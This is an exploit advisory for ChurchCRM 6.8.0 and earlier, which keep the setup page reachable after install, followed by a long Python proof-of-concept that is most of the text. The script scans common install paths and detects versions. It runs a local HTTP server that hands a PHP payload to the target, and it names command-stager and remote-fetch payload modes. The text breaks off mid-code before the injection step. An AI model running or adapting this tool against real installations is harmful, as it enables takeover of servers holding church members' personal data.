============================================================================================================================================= | # Title : ChurchCRM ≤ 6.8.0 – Setup Page Security Misconfiguration | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) | | # Vendor : https://github.com/ChurchCRM/ | ============================================================================================================================================= [+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations. Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version. [+] POC : #!/usr/bin/env python3 import argparse import base64 import random import string import sys import time import logging import re import socket import threading import http.server import socketserver from urllib.parse import urljoin, urlparse, quote from typing import Optional, Dict, Any, Tuple, List, Union from dataclasses import dataclass, field from enum import Enum from functools import wraps import json import requests from requests.exceptions import RequestException from requests.adapters import HTTPAdapter from urllib3.util.retry import Retry VERSION = "2.0.0" USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" TIMEOUT = 30 MAX_RETRIES = 3 DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch'] class ExploitError(Exception): """Base exception for exploit errors""" pass class TargetUnreachableError(ExploitError): """Target is not reachable""" pass class InjectionFailedError(ExploitError): """Failed to inject payload""" pass class PayloadServerError(ExploitError): """Payload server error""" pass class VersionDetectionError(ExploitError): """Version detection error""" pass class TargetType(Enum): """Target platform types""" LINUX_CMD_STAGER = "linux_cmd_stager" PHP_MEMORY = "php_memory" PHP_FETCH = "php_fetch" class CheckCode(Enum): """Check result codes""" SAFE = "safe" VULNERABLE = "vulnerable" UNKNOWN = "unknown" UNREACHABLE = "unreachable" @dataclass class TargetInfo: """Target information""" url: str base_path: str scheme: str host: str port: int version: Optional[str] = None vulnerable: Optional[bool] = None detected_paths: List[str] = field(default_factory=list) @dataclass class ExploitResult: """Exploit result""" success: bool session: Optional[requests.Session] = None message: str = "" target: Optional[TargetInfo] = None output: Optional[str] = None class Version: """Advanced version handling""" def __init__(self, version_string: str): self.original = version_string self.clean = self._clean_version(version_string) self.parts = self._parse_parts(self.clean) self.suffix = self._extract_suffix(version_string) def _clean_version(self, version: str) -> str: """Clean version string""" match = re.search(r'(\d+\.\d+(?:\.\d+)?)', version) return match.group(1) if match else '0.0.0' def _parse_parts(self, version: str) -> List[int]: """Parse version into integer parts""" parts = [] for part in version.split('.'): try: parts.append(int(part)) except ValueError: parts.append(0) return parts def _extract_suffix(self, version: str) -> str: """Extract suffix (e.g., -beta2, -RC1)""" match = re.search(r'[-_]([a-zA-Z]+\d*)$', version) return match.group(1) if match else '' def __lt__(self, other: Union[str, 'Version']) -> bool: """Less than comparison""" if isinstance(other, str): other = Version(other) for i in range(max(len(self.parts), len(other.parts))): v1 = self.parts[i] if i < len(self.parts) else 0 v2 = other.parts[i] if i < len(other.parts) else 0 if v1 < v2: return True if v1 > v2: return False if self.suffix and not other.suffix: return True # Has suffix is considered older if not self.suffix and other.suffix: return False return False def __le__(self, other: Union[str, 'Version']) -> bool: """Less than or equal""" return self < other or self == other def __eq__(self, other: Union[str, 'Version']) -> bool: """Equal comparison""" if isinstance(other, str): other = Version(other) return self.parts == other.parts and self.suffix == other.suffix def __str__(self) -> str: return self.original def __repr__(self) -> str: return f"Version('{self.original}')" def safe_urljoin(base: str, path: str) -> str: """ Safely join URL parts handling base paths correctly Examples: >>> safe_urljoin('http://example.com/churchcrm', '/setup/') 'http://example.com/churchcrm/setup/' >>> safe_urljoin('http://example.com/churchcrm/', 'setup/') 'http://example.com/churchcrm/setup/' """ base = base.rstrip('/') if path.startswith('/'): parsed = urlparse(base) base_without_path = f"{parsed.scheme}://{parsed.netloc}" base_path = parsed.path.rstrip('/') return f"{base_without_path}{base_path}{path}" else: return f"{base}/{path.lstrip('/')}" def normalize_url(url: str) -> str: """Normalize URL by adding scheme if missing and removing trailing slash""" if not url.startswith(('http://', 'https://')): url = 'http://' + url return url.rstrip('/') def parse_target(url: str) -> TargetInfo: """Parse target URL and return TargetInfo""" url = normalize_url(url) parsed = urlparse(url) return TargetInfo( url=url, base_path=parsed.path.rstrip('/') or '/', scheme=parsed.scheme, host=parsed.hostname, port=parsed.port or (443 if parsed.scheme == 'https' else 80), ) def discover_base_path(session: requests.Session, base_url: str, paths: List[str] = None, logger: logging.Logger = None) -> Optional[str]: """ Discover the correct base path by trying common paths """ if paths is None: paths = DEFAULT_PATHS parsed = urlparse(base_url) base = f"{parsed.scheme}://{parsed.netloc}" for path in paths: test_url = f"{base}{path}" if path else base try: setup_url = safe_urljoin(test_url, '/setup/') if logger: logger.debug(f"Trying path: {setup_url}") response = session.get(setup_url, timeout=5, allow_redirects=False) if response.status_code in [200, 301, 302]: if logger: logger.info(f"Found ChurchCRM at: {test_url}") return test_url except: continue return None class ColoredFormatter(logging.Formatter): """Custom formatter with colors""" COLORS = { 'DEBUG': '\033[36m', 'INFO': '\033[32m', 'WARNING': '\033[33m', 'ERROR': '\033[31m', 'CRITICAL': '\033[35m', 'RESET': '\033[0m' } def format(self, record): levelname = record.levelname if levelname in self.COLORS: record.levelname = f"{self.COLORS[levelname]}{levelname}{self.COLORS['RESET']}" return super().format(record) def setup_logger(debug: bool = False) -> logging.Logger: """Setup logger with appropriate configuration""" logger = logging.getLogger('churchcrm_exploit') logger.setLevel(logging.DEBUG if debug else logging.INFO) if not logger.handlers: handler = logging.StreamHandler(sys.stdout) formatter = ColoredFormatter( '%(asctime)s [%(levelname)s] %(message)s', datefmt='%H:%M:%S' ) handler.setFormatter(formatter) logger.addHandler(handler) return logger def create_session(retries: int = MAX_RETRIES) -> requests.Session: """Create requests session with retry logic""" session = requests.Session() retry_strategy = Retry( total=retries, backoff_factor=0.5, status_forcelist=[500, 502, 503, 504], allowed_methods=["HEAD", "GET", "OPTIONS", "POST"] ) adapter = HTTPAdapter(max_retries=retry_strategy) session.mount("http://", adapter) session.mount("https://", adapter) session.headers.update({ 'User-Agent': USER_AGENT, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', }) return session def random_string(length: int = 8) -> str: """Generate random string""" return ''.join(random.choices(string.ascii_lowercase, k=length)) def random_int_string(min_len: int = 5, max_len: int = 10) -> str: """Generate random integer as string""" length = random.randint(min_len, max_len) return ''.join(random.choices(string.digits, k=length)) def random_url() -> str: """Generate random URL""" return f"http://{random_string(8)}.com/" class PayloadHandler(http.server.SimpleHTTPRequestHandler): """HTTP handler for serving payloads""" payload = None logger = None request_count = 0 def do_GET(self): """Handle GET request""" PayloadHandler.request_count += 1 if self.logger: self.logger.debug(f"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}") if self.payload: self.send_response(200) self.send_header('Content-Type', 'application/x-httpd-php') self.send_header('Content-Length', str(len(self.payload))) self.send_header('Pragma', 'no-cache') self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate') self.end_headers() self.wfile.write(self.payload.encode()) if self.logger: self.logger.info(f"Served payload to {self.client_address[0]}") else: self.send_response(404) self.end_headers() def log_message(self, format, *args): """Override to use our logger""" if self.logger and self.logger.isEnabledFor(logging.DEBUG): self.logger.debug(f"Payload server: {format % args}") class PayloadServer: """HTTP server for serving payloads""" def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0): self.logger = logger self.host = host self.port = port self.server = None self.thread = None self.payload = None def start(self, payload: str) -> str: """Start payload server and return URL""" self.payload = payload PayloadHandler.payload = payload PayloadHandler.logger = self.logger PayloadHandler.request_count = 0 self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False) self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.server.server_bind() self.server.server_activate() self.port = self.server.server_address[1] self.thread = threading.Thread(target=self.server.serve_forever) self.thread.daemon = True self.thread.start() server_url = f"http://{self.get_local_ip()}:{self.port}/" self.logger.info(f"Payload server started at {server_url}") return server_url def stop(self): """Stop payload server""" if self.server: self.server.shutdown() self.server.server_close() self.logger.debug(f"Payload server stopped (served {PayloadHandler.request_count} requests)") def get_local_ip(self) -> str: """Get local IP address""" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(('10.255.255.255', 1)) ip = s.getsockname()[0] except Exception: ip = '127.0.0.1' finally: s.close() return ip def wait_for_requests(self, timeout: int = 10) -> bool: """Wait for at least one request""" start = time.time() while time.time() - start < timeout: if PayloadHandler.request_count > 0: return True time.sleep(0.5) return False class VersionDetector: """Detect ChurchCRM version from response""" def __init__(self, logger: logging.Logger): self.logger = logger self.patterns = [ (re.compile(r'CRM-VERSION:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'header'), (re.compile(r']*name=["\']version["\'][^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'meta'), (re.compile(r']*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^>]*name=["\']version', re.I), 'meta'), (re.compile(r'